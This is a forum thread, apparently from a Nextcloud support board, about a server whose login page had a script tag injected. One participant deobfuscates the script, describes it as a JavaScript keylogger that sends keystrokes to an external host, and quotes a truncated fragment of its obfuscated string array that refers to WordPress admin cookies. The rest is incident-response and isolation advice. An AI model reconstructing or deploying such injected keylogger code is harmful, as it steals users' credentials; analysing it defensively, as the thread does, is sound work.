Nextcloud Server hacked

Hi everyone,

Suddenly my Nextcloud stoped working. In close investigation I saw that a js script was added on top of login page.

<script type='text/javascript' src='' async='true'></script>

Is there any easy way to remove this, like doing a “reinstall” or something similar?
By the way, most of my sites on that server were hacked by this script, so I doubt its a problem by NextCloud.

Maybe you can read this documentation and execute commands to find the files (not tested).

Do you another webbased software e.g. Wordpress …

Post more details e.g. the script itself. Search parts of the script in the internet and post results.

Yeah. This is one reason - amongst several others - that I use LXC to seperate each and every webservices. In truth, then my HAProxy instance runs fast-cgi to anything BUT nextcloud, so only my NC container has the overhead of an additional webserver. The other webservices are not mission critical, and holds very little important data. However if I had used NGINX as reverse proxy instead of HAProxy, I bet I could have spared the apache2. But the extra overhead is worth it for added security in terms of segregation, so I am not sure I would have chosen that anyway.

Anyways. I ran the js it points to, through JS Deobfuscator - Unobfuscator - Online Javascript to Native Decoder

It is a keylogger that sends the key presses async to an external address. I will not post it here, but you can follow it in a private window, copy the text on the screen, and run it through the above online unobfuscator. You will see that it is a JS based keylogger.

However this piece tells me it was a wordpress hack:

function _0x320b() {
 var unimplementedMethods = ["396114UBrarG", "getTime", "src", "5yjhmnQ", "542101ElmiFa", "wpcurrentadmin", "172743ORXpEk", "7091MiccWl", "738659VtOMud", "toUTCString", "insertBefore", "; expires=", "985563xDOOsM", "appendChild", "script", "7SpDjJV", "16608290NQmGyT", "split", "24GZSqIV", "1298788QqNMJn", "52ZioigQ", "318KWQXzl", "push", "length", "head", "wp-settings", "248960kBdeJg", "8991730kougUB", "12CLXHWv", "shift", 



Ok. Then @roga direct change the Nextcloud passwords. Also a good reason why use 2FA.

If someone manages to inject code in your Nextcloud, you have to consider your instance to be compromised. Just changing passwords or some simple reinstall won’t do it, the people attacking you can just do it again.
I’d consider to backup what you currently have (full disk backup), so you can investigate how the attacker could compromise your Nextcloud setup without the setup being online. Perhaps in the logs you can find if they managed to access some files (unusual ips etc.), but it is possible if they had full access and they cleaned the logs.

So then a wordpress issue shouldn’t compromise your Nextcloud. Or via the proxy?

1 Like

Excactly. Even if they hacked my reverse proxy, they would need to independantly and exclusively hack my nextcloud “box”. No wordpress vulnerability works on nextcloud. However several wordpress vulnerabilities works to gain privileges on the webserver running wordpres, which is indeed a direct breach of nextcloud as well, if nextcloud is running on same webserver (the www-data user is the user used by the webserver. This user owns all the nextcloud folders and files). By seperating this on isolated islands, my nextcloud is safe from a wordpress hack.

They could already inject their code into the communication (and before the data is encrypted), possibly extract passwords/data. I don’t know what else they should hack from your Nextcloud…

You wrote that they added a javascript to the Nextcloud login page, so you have a problem with your connection to Nextcloud. Was the js-part injected by the proxy or by the Nextcloud webserver?

You misunderstand. I took the js script they injected on YOUR sites, and ran it through a deobfuscator. I have not been hacked yet. They cannot compromise my site unless re-writing my reverserpoxy to terminate TLS locally, then proxy to nextcloud HTTPS, however that would give itself away the instant they do that, as the certifiacte now offered by the reverse proxy instead of NC itself, will by guarantee, not be trusted.

No they cannot inject it into the stream. I use TLS passthrough hence decrypts the trafic on the Nextcloud only.